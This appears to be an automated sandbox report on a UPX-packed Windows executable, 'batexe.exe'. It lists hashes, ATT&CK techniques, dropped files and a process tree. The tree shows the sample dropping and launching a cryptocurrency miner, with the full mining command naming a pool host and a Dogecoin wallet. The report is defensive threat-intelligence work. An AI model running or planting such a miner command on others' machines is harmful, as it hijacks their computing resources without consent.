73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
291s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20/02/2024, 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
2328	b2e.exe
3116	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4192-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 2328	4192	batexe.exe	85
PID 4192 wrote to memory of 2328	4192	batexe.exe	85
PID 4192 wrote to memory of 2328	4192	batexe.exe	85
PID 2328 wrote to memory of 3620	2328	b2e.exe	86
PID 2328 wrote to memory of 3620	2328	b2e.exe	86
PID 2328 wrote to memory of 3620	2328	b2e.exe	86
PID 3620 wrote to memory of 3116	3620	cmd.exe	89
PID 3620 wrote to memory of 3116	3620	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\41D6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe

Filesize
4.2MB

MD5
08a59d5a03e9c0405f0f56631750fc0f

SHA1
877a28d508a3f4ecdfad08dbb47f63bf78221640

SHA256
facc153a58caf41769b7b137a814f61a5170fec923086aafeeb6ffe945a221c1

SHA512
4b0167d68166460ed13c0e521a1ea4f8a43c0695088a3d73a250de5507b713094a882f694dcf09a1c0ded7a7150c9f0e2f42871da5fca4ec180ef3d6b115191b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe

Filesize
3.6MB

MD5
a202c43df284047b4026052f2015b382

SHA1
531129cc3cff7410080574b0fd1f8404c8c343d6

SHA256
22e0189ee48633fcbb780d8ce081c027adcfd289ce6b90e0dddf506b78a59a66

SHA512
03192f196ccd2100255c1fad56bd14019876f87509f7215f1af469e93a9e4a8686d7bd18a1273d46e05711d1017a87948b4299a6d4597fa66001b29ee310cea2

Download Submit
C:\Users\Admin\AppData\Local\Temp\3294.tmp\b2e.exe

Filesize
2.6MB

MD5
f845d6b8c0beb43591f7ebc96344f81b

SHA1
5bcb9d96f6589b559060e11d6d5a0bf73d91c80e

SHA256
841b8431f27f5e631d37c605530e6ce5430559c96fa9a6ddebc7e9dd63ad04b2

SHA512
8de293211ad14117c9ecb797c78c738c91b691f3dc861401d537cc72c9ba05a40340c452938bd6d72bf400efa1fffb7bb387f204035697b8a229a29288d5d357

Download Submit
C:\Users\Admin\AppData\Local\Temp\41D6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
256KB

MD5
e0c023f2dc80d8f2415830dcaf9b9e45

SHA1
9806d1f4bd0f76e044071f95f9210b09c2c09fd0

SHA256
dc7de4210ed002ed6ab8340d21f999fd77ff9c1fe4361227ebbe3324b24009a0

SHA512
76d594de32b07899a478e6b1fbe4a158492174439df3a65478b21135aea9695f47cd6b5006d1bb28398fb1b1f0e64f33e839ae16225fe755bcec4d25d3caf0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
483KB

MD5
4bda65094b0ceca12a7381dd0089e944

SHA1
f212146f99130be5f33c5f565509a6ea18d03419

SHA256
86d1e9ec40a003b8d11cb92017b764822c7aa7dcf8736470680454ab19731e07

SHA512
fd65caf1cd9bcb5cb4cdae9f0a8038f5e76a059933a7c0673807b56619cddce71bc0d8b351809b865a062d9273a2cd5ac5ea6b59ea0b6a0c2176d66e7302480f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
542KB

MD5
77c67b724490b39dc04456f159604dfd

SHA1
e4c774925139cffad702dbcacdebb9fc1f18aab7

SHA256
6fde97021627e1103a4627d0a9bb42f923d9afe14975879dbfeb75aea203429a

SHA512
ee994a158f3ecb50861f7f075ff829b1e6655a9f30cda5a9885e77dd819fc52237e0a396986dfa9c9edc490f8c83f2c8d649282d70df81d505f0301fab097639

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
608KB

MD5
2c51b71191ef67182198611d281a70dc

SHA1
772c59964c73a13f5ab57cb687e353c846383a1d

SHA256
b627f16b23d7f2297b0496c76a1a237892868431e3075a8af8ab5633fb9651d9

SHA512
b107d3a8047f5a927f7f25755b021b5899d3eeb8749b1e6f172b5c1ebd020d1d06625293bd8a578a4570260710f6f5439aa59e30817a1cfec55de8cffbd0e714

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
410KB

MD5
910e1adba3bc2948bba2e70755e20fd7

SHA1
b8c13e9419f174c31a5b8d52099a00d09167eda3

SHA256
b9c9a00e9679afaea3298a71152a92eed69f35e9a9372925c3620b6e3c8061ab

SHA512
8cea477cf48c46460112944845196d7a8012b53bf9528dbdd95a87e68741aa3a3d27fd99fed63294f74b624d8e49740f1a8ae4f95665f9d154abea1c66b6149c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
337KB

MD5
9e54b81dd1ba809523c9cdc0a5e291fd

SHA1
362b21649778dbf786d17e4187eafc9f6bef4b00

SHA256
2a5b19a37f43347a16537bb93162287a604d47dcc234a8f98c1fbacb4e21e923

SHA512
b231165c6bead0684f93f1d89dbcb1194aa8b6e6126f8a2f8d11eebc89fa88d6b2ba800e57ffd3e0270cc98bc66e442e6ec72977d13d50ac86f465c3b31e6e77

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
708KB

MD5
f27fbbbe24695182c4d69706254cc7eb

SHA1
48bb33dca68b8364d1c417d9b904faa941dd0e7f

SHA256
bd915d560a73f56176c78a74053c5070b0df145e17ff87df43ccbc9c37ab594e

SHA512
c1d076114d51427a8e4cc348fa952d45a67e88d6af78478c6db2b6a7f47ff590510f802c465a4aaaa4d45f55681f209d1fb1402aa494537dff4dc25f72ec3089

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
658KB

MD5
9f8021c7bd1271364f5cfcda9b23f190

SHA1
74642bba26a9f9b541995f07ec36337947fde710

SHA256
fb0747b476e414325562062e3784c38721172f82b5f2960ceba3b260f654845c

SHA512
e83b2fb6a4735b2e7bfc1486e36c7e3587e19fb10194b7b655457d6c29f5a2abc49ae2f28ec7e7912a33c87a456f1ed9df648f58b7edfaf61f3100ffb5779402

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
482KB

MD5
590edc3cacd407682c2bbcc3b29ac1a8

SHA1
a77d02e99cde8c262250e803dd487a08730c2fa8

SHA256
b1d04f44e145f2330dc74188ddb6c8df1ae2ac0775e870be48edd62a76f1e5c5

SHA512
3589811bb0ebaa2aa908e9160fd58b883b8ea9c57249837c6700db21398a7f4837791ec68fe4b3b1aa5407d915c0ef98fff37a32227ac72b30421cafd2bc85c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
549KB

MD5
e939d0497478d5445031572565c216a5

SHA1
0e657da5462ac7100842eb7c03c2a0bfa46781c1

SHA256
1c2007f881eea599b66bd81816210d50bdfbea9b8100d669396d0f0c83c3b854

SHA512
0ded826afa8b9f92d7bb622d3eaca8a1eab56ccc63703dde5745176cf79083ff753180d455ca1856d22377a25b14092da2c5c365da3caadb7a510bdef7813c9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
501KB

MD5
5dc8a2e305b57be21547ec3f33ab848c

SHA1
ed01cfc3214b4df7a5f5a87a5d3bf484aa2b21b2

SHA256
f446b84abd2fbe3d50140fa2e8284742922218d354cffb2ed9d17648cf358a09

SHA512
b3a6908cc2dab6b2998cc1b6b28a95f9c34ada39eca83589c318e8d78e738a1f54aafef357ae42ff1a26de3dee99fbe7162f12251eb214da697cc544f0092c07

Download Submit
memory/2328-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2328-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3116-47-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/3116-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-45-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/3116-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3116-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3116-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4192-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download